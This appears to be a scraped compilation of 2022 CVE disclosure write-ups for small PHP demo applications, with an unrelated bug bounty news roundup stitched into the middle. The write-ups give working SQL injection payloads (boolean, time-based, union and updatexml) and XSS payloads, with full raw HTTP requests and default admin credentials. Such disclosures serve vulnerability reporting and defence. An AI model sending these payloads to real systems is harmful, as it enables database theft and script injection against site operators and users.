Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /print.php.

Permalink

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: 庞习铭

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/print.php?id=

Vulnerability location: /youthappam/print.php?id=, id

dbname =youthappam,length=10

\[+\] Payload: /youthappam/print.php?id=1%27%20and%20length(database())%20=10--+ // Leak place ---> id

GET /youthappam/print.php?id\=1%27%20and%20length(database())%20\=10\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close

length = 10 

length = 9

CVE-2022-43329: bug_report/SQLi-1.md at main · YReyi/bug_report

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /editorder.php.

Permalink

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: 庞习铭

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/editorder.php?id=

Vulnerability location: /youthappam/editorder.php?id=, id

dbname =youthappam,length=10

\[+\] Payload: /youthappam/editorder.php?id=1%20and%20length(database())%20=10--+ // Leak place ---> id

GET /youthappam/editorder.php?id\=1%20and%20length(database())%20\=10\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close

length = 10 

length = 9

CVE-2022-43330: bug_report/SQLi-2.md at main · YReyi/bug_report

New web targets for the discerning hacker

New web targets for the discerning hacker

Last month two Italian security researchers revealed they had netted more than $46,000 in bug bounties after discovering a misconfiguration vulnerability in Akamai – despite receiving nothing from Akamai itself.

The exploit, which leveraged HTTP smuggling and hop-by-hop header abuse techniques, instead achieved payouts from several of the company’s customers. These included $25,200 from PayPal and rewards from Airbnb, Hyatt Hotels, Valve, Zomato, and Goldman Sachs.

In other payout news, researcher Saajan Bhujel bagged a $10,000 bounty from GitHub after finding a way to spoof the platform’s login interface. Bypassing HTML filtering in the MathJax display engine allowed him to inject form elements and change the website’s CSS, potentially fooling users into entering credentials into a fake login page.

Apple, meanwhile, has invited researchers to apply for the Apple Security Research Device Program, with applications open until the end of November.

Successful applications will receive a Security Research Device (SRD) – a specially-fused iPhone that allows iOS security research to be carried out without having to bypass its security features. Shell access is available, and researchers can run any tools, choose their own entitlements, and customize the kernel.

Apple has also revamped its ‘Apple Security Research’ website, with researchers now able to track bug reports via real-time status updates. The program has paid out nearly $20 million in bounties since launching 2.5 years ago.

Meanwhile, the Swiss National Cyber Security Centre (NCSC) has launched a private bug bounty program that involves probing the federal government’s web applications, APIs, and critical infrastructure.

Amazon’s new hardware-focused program, managed by HackerOne, is offering rewards ranging up to $25,00 for bugs in Fire, Echo, FireTV, Halo, Luna Controller, and Kindle devices, along with corresponding applications and firmware.

And finally, the US Department of Defense said it paid out a total of $75,000 in bounties for 648 bug reports submitted by 267 researchers during a hackathon that took place in July.

**The latest bug bounty programs for November 2022**

The past month saw the arrival of several new bug bounty programs. Here’s a list of the latest entries:

**Apple Security Research Device Program**

**Program provider:  
**Independent

**Program type:  
**Private

**Max reward:  
**$1 million

**Outline:  
**Apple will send selected security researchers a Security Research Device (SRD), a specially fused iPhone that allows shell access, kernel customization, and iOS security research without the need to bypass security features.

**Notes:  
**Applications can be submitted until November 30, 2022, with successful candidates receiving an SRD for 12-month renewable periods, and reports potentially eligible for rewards through the upgraded Apple Security Bounty.

Check out the Apple SRD bug bounty page for more details

**Amazon**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$25,000

**Outline:  
**Fire, Echo, FireTV, Halo, Luna Controller, and Kindle devices, along with corresponding applications and firmware, make up the 36 assets in scope under the Amazon Vulnerability Research Program.

**Notes:  
**Rewards for bugs in services and apps range up to $20,000, while bounties for devices rise higher still to $25,000.

Check out the Amazon bug bounty page for more details

**Beanstalk**

**Program provider:  
**Immunefi

**Program type:  
**Public

**Max reward:  
**$1.1 million

**Outline:  
**The bug bounty program for Beanstalk – a permissionless fiat stablecoin protocol built on Ethereum – centers on smart contracts and preventing the loss of user funds.

**Notes:  
**Beanstalk describes itself as forming “the monetary basis of an Ethereum-native, rent-free economy facilitated by the positive carry of its native fiat currency, a stablecoin called Bean”.

Check out the Beanstalk bug bounty page for more details

**BigCommerce**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$2,500

**Outline:  
**A NASDAQ-listed provider of Software-as-a-Service (SaaS) ecommerce services to retailers.

**Notes:  
**Valid targets include bigcommerce.net, bigcommerce.com, and related iOS and Android apps.

Check out the BigCommerce bug bounty page for more details

**Blend Labs**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$5,000

**Outline:  
**Blend Labs is a provider of cloud-based software for financial services firms in the US.

**Notes:  
**Just one target is in scope – knox.beta.blendlabs.com – with blend.com not a viable target.

Check out the Blend Labs bug bounty page for more details

**Deribit**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$6,000

**Outline:  
**The Amsterdam-based cryptocurrency option exchange is offering between $2,500 and $6,000 for critical vulnerabilities.

**Notes:  
**Testing is only allowed within Deribit’s test environment.

Check out the Deribit bug bounty page for more details

**Jungle Smart Contract**

**Program provider:  
**HackenProof

**Program type:  
**Private

**Max reward:  
**$1 million

**Outline:  
**A peer-to-peer NFT marketplace for digital goods, art, collectibles, and other virtual assets backed by the blockchain.

**Notes:  
**Some 14 protocols are in scope.

Check out the Jungle Smart Contract bug bounty page for more details

**Lido on Polkadot and Kusama**

**Program provider:  
**Immunefi

**Program type:  
**Public

**Max reward:  
**$2 million

**Outline:  
**Lido, a liquid staking solution for Ethereum, has launched bug bounty programs focused on DOT (Polkadot) and KSM (Kusama).

**Notes:  
**Smart contract bugs could command rewards of up to $2 million, while flaws in websites and applications max out at $40,000.

Check out the Lido on Polkadot and Kusama bug bounty pages for more details

**Private Internet Access (PIA)**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$1,250

**Outline:  
**PIA, which already had a vulnerability disclosure program, is now incentivizing researchers to probe its technologies with rewards ranging up to $1,250.

**Notes:  
**Priority bugs are those enabling remote code execution, unlicensed access to VPN servers, or third-party monitoring or leaking of user data.

Check out the PIA bug bounty page for more details

**Rec Room**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$2,500

**Outline:  
**A video game and video game creation platform available on Windows, Xbox, PlayStation, Oculus Quest, Apple devices, and Android.

**Notes:  
**Rec Room web application and API are in scope, but the free, cross-platform Rec Room game is the “primary target”.

Check out the Rec Room bug bounty page for more details

**Redox**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$5,000

**Outline:  
**Redox technology facilitates the transferring of electronic healthcare records between organizations.

**Notes:  
**Critical bugs ordinarily fetch rewards of between $3,000-$4500, but submissions that “reflect an understanding of the platform and can describe the vulnerability and its impact and how to resolve it clearly and concisely” could net bounties of $5,000.

Check out the Redox bug bounty page for more details

**Stravito**

**Program provider:  
**Intigriti

**Program type:  
**Public

**Max reward:  
**Undisclosed

**Outline:  
**The market research platform claims McDonalds, Electrolux, Comcast, and Carlsberg among its customers.

**Notes:  
**Said Stravito founder and CEO Thor Olof Philogène: “Partnering with Intigriti, the leaders in this space, allows us to add an additional layer of stress testing to ensure we continue delivering the most robust and secure platform in our space.”

Check out the Stravito bug bounty page for more details

**Swiss National Cybersecurity Centre**

**Program provider:  
**Bug Bounty Switzerland

**Program type:  
**Private

**Max reward:  
**Undisclosed

**Outline:  
**The Swiss National Cybersecurity Centre (NCSC) is seeking submissions for bugs in the federal government’s web applications, APIs, and critical infrastructure.

**Notes:  
**As previously reported by The Daily Swig, the program follows a pilot project conducted in 2021 where ethical hackers probed IT systems of the Swiss parliament and Federal Department of Foreign Affairs for security vulnerabilities.

Check out the Swiss NCSC bug bounty page for more details

**Other bug bounty and VDP news this month**

*   **HackerOne** is expanding numbers of its ‘Hacker Success Managers’ to assist bug hunters, and has launched a new attack surface management platform, HackerOne Assets
*   **Bugcrowd** is now a CVE numbering authority, and has also launched a program management platform to help customers coordinate pen test, bug bounty, VDP, and ASM assets
*   European platform **Intigriti** has launched Hybrid Pentesting, which purports to combine the ‘pay-for-impact’ bug bounty model with the dedicated resourcing strategy of penetration testing
*   **YesWeHack** has launched MyOpenVDP, a turnkey vulnerability disclosure program-hosting solution
*   **Open Bug Bounty** has surpassed the milestone of notching one million web security vulnerabilities (PDF) reported and patched eight years after the platform’s launch

Curated by Adam Bannister. Additional reporting by Emma Woollacott.

**PREVIOUS EDITION** Bug Bounty Radar // The latest bug bounty programs for October 2022

Bug Bounty Radar // The latest bug bounty programs for November 2022

Fast Food Ordering System v1.0 was discovered to contain a SQL injection vulnerability via the component /fastfood/purchase.php.

**Vulnerability Description**

Fast Food Ordering System v1.0 was discovered to contain a SQL injection vulnerability via the edit-admin.php. It is an open source project from campcodes.com. This vulnerability can lead to database information leakage.

1.  Vulnerability Submitter: Tr0e
    
2.  vendors: Fast Food Ordering System v1.0;
    
3.  The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version;
    
4.  Vulnerability location: /fastfood/purchase.php
    

**Vulnerability Verification**

\[+\] Payload:

test'and(select\*from(select+sleep(3))a/\*\*/union/\*\*/select+1)='

POC：

POST /fastfood/purchase.php HTTP/1.1
Host: 192.168.0.111:91
Content\-Length: 259
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.0.111:91
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.111:91/fastfood/order.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=rbcvgagjbbad1bbrbb62nukgmc
Connection: close
quantity\_0=&quantity\_1=&quantity\_2=&quantity\_3=&quantity\_4=&quantity\_5=&quantity\_6=&quantity\_7=&quantity\_8=&quantity\_9=&quantity\_10=&quantity\_11=&productid%5B%5D=23%7C%7C12&quantity\_12=10&customer=test'and(select\*from(select+sleep(3))a/\*\*/union/\*\*/select+1)\='

**How to verify**

Build the vulnerability environment according to the steps provided by the source code author and execute the poc provided above.

The vulnerability is located at the "Order - Save" function, you shuold inserts Payload when you save order，as shown in the following figure：

CVE-2022-43081: CVE_Hunter/SQLi-3.md at main · Tr0e/CVE_Hunter

A cross-site scripting (XSS) vulnerability in /fastfood/purchase.php of Fast Food Ordering System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the customer parameter.

**Vulnerability Description**

Fast Food Ordering System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the purchase.php. It is an open source project from campcodes.com. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the customer parameter.

1.  Vulnerability Submitter: Tr0e
    
2.  vendors: Fast Food Ordering System v1.0;
    
3.  The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version;
    
4.  Vulnerability location: /fastfood/purchase.php
    

**Vulnerability Verification**

\[+\] Payload:

<script\>alert("XSS")</script\>

POC：

POST /fastfood/purchase.php HTTP/1.1
Host: 192.168.0.111:91
Content\-Length: 259
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.0.111:91
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.0.111:91/fastfood/order.php
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9,en;q\=0.8
Cookie: PHPSESSID\=rbcvgagjbbad1bbrbb62nukgmc
Connection: close

quantity\_0\=&quantity\_1\=&quantity\_2\=&quantity\_3\=&quantity\_4\=&quantity\_5\=&quantity\_6\=&quantity\_7\=&quantity\_8\=&quantity\_9\=&quantity\_10\=&quantity\_11\=&productid%5B%5D\=23%7C%7C12&quantity\_12\=10&customer\=<script\>alert("XSS")</script\>

**How to verify**

Build the vulnerability environment according to the steps provided by the source code author and execute the Payload provided above.

The vulnerability is located at the "Order - Save" function, you shuold inserts Payload when you save order，as shown in the following figure：

CVE-2022-43082: CVE_Hunter/XSS-4.md at main · Tr0e/CVE_Hunter

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/tests/manage_test.php.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: 云影

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/admin/tests/manage\_test.php?id=

Vulnerability location: /odlms/admin/tests/manage\_test.php?id=,id

dbname=odlms\_db,length=8

\[+\] Payload: /odlms/admin/tests/manage\_test.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8--+ // Leak place ---> id

GET /odlms/admin/tests/manage\_test.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-43126: Cve_report/SQLi-1.md at master · vickysuper/Cve_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /appointments/update_status.php.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: 云影

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/admin/appointments/update\_status.php?id=

Vulnerability location: /odlms/admin/appointments/update\_status.php?id=,id

dbname=odlms\_db,length=8

\[+\] Payload: /odlms/admin/appointments/update\_status.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /odlms/admin/appointments/update\_status.php?id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-43127: Cve_report/SQLi-4.md at master · vickysuper/Cve_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=user/manage_user.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: 云影

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/admin/?page=user/manage\_user&id=

Vulnerability location: /odlms/admin/?page=user/manage\_user&id=,id

dbname=odlms\_db,length=8

\[+\] Payload: /odlms/admin/?page=user/manage\_user&id=6%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /odlms/admin/?page\=user/manage\_user&id\=6%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-43124: Cve_report/SQLi-2.md at master · vickysuper/Cve_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /appointments/manage_appointment.php.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: 云影

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/admin/appointments/manage\_appointment.php?id=

Vulnerability location: /odlms/admin/appointments/manage\_appointment.php?id=,id

dbname=odlms\_db,length=8

\[+\] Payload: /odlms/admin/appointments/manage\_appointment.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /odlms/admin/appointments/manage\_appointment.php?id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-43125: Cve_report/SQLi-3.md at master · vickysuper/Cve_report

A cross-site scripting (XSS) vulnerability in admin-add-vehicle.php of Vehicle Booking System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the v_name parameter.

**Vulnerability Description**

Vehicle Booking System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the admin-add-vehicle.php. It is an open source project from https://codeastro.com/ . This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the v\_name parameter.

1.  Vulnerability Submitter: Tr0e
    
2.  vendors: Vehicle Booking System in PHP with Source Code - CodeAstro
    
3.  The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version
    
4.  Vulnerability location: /VehicleBooking-PHP/admin/admin-add-vehicle.php
    

**Vulnerability Verification**

\[+\] Payload:

<script\>alert("XSS")</script\>

POC：

POST http://192.168.0.120:91/VehicleBooking-PHP/admin/admin-add-vehicle.php HTTP/1.1
Host: 192.168.0.120:91
Content\-Length: 905
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.0.120:91
Content\-Type: multipart/form\-data; boundary\=\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.0.120:91/VehicleBooking-PHP/admin/admin-add-vehicle.php
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9,en;q\=0.8
Cookie: PHPSESSID\=ldi7mdlvm8g7bnfhunuvrhp8ne
Connection: close

\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_name"

<script\>alert("XSS")</script>
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_reg\_no"

aaa
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_pass\_no"

111
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_driver"

Demo User
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_category"

Bus
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_status"

Booked
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_dpic"; filename\="Tr0e.jpg"
Content\-Type: image/jpeg

123
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="add\_veh"

\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu\--

**How to verify**

1.  Build the vulnerability environment according to the steps provided by the source code author;
2.  log in to the background management system through the default account and password（Email: admin@mail.com Password: codeastro.com）;
3.  The vulnerability lies in the "Vehicles - Add - Add Vehicle" function, you should inserts Payload when you Add Vehicle, as shown in the following figure：

Tag

#windows